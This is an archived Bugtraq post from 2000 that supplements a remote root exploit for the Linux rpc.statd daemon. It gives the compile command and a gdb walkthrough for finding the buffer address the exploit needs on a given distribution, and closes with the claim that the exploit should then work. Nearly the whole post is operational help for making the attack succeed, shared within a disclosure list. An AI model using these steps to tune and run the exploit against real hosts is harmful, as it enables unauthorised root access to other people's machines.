[16056] in bugtraq
rpc.statd remote root xploit for linux/x86 (little fix)
daemon@ATHENA.MIT.EDU (Doing)
Wed Aug 2 13:39:53 2000
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-Id: <398841AA.43018B2C@teleline.es>
Date: Wed, 2 Aug 2000 15:43:38 +0000
Reply-To: Doing <jdoing@teleline.es>
From: Doing <jdoing@TELELINE.ES>
To: BUGTRAQ@SECURITYFOCUS.COM
To compile the xploit you need the librpcsvc library:
gcc statd.c -o statd -lrpcsvc
Way of finding offsets for your distro/version:
Launch statd and attach it with gdb:
[root@localhost statd]# ./statd
[root@localhost statd]# ps aux | grep st
root 394 0.0 0.9 1184 576 ? S 15:27 0:00 ./statd
[root@localhost statd]# gdb ./statd
GNU gdb 4.18
[ cut cut cut cut ]
(gdb) attach 394
Attaching to program:
/zecreto/doing/xploits/daemon/rpc.statd/knfsd-1.3.2/utils/statd/./statd,
process 394
[ Now put a breakpoint on the function log() ]
(gdb) break log
Breakpoint 1 at 0x804a10a: file log.c, line 82.
(gdb) c
Continuing.
[ At this point run the xploit ]
Breakpoint 1, log (level=2, fmt=0x804c820 "SM_MON request for hostname
containing '/': %s") at log.c:82
82 va_start(ap, fmt);
[ And put another breakpoint in the function syslog() ]
(gdb) break syslog
Breakpoint 2 at 0x400d12e6: file syslog.c, line 102.
(gdb) c
Continuing.
Breakpoint 2, syslog (pri=2,
fmt=0xbfffef38 "SM_MON request for hostname containing '/':
[garbage]..)
^^^^^^^^^
This is the address of the buffer in function log. If you run
the xploit
with this value it should work.
Doing
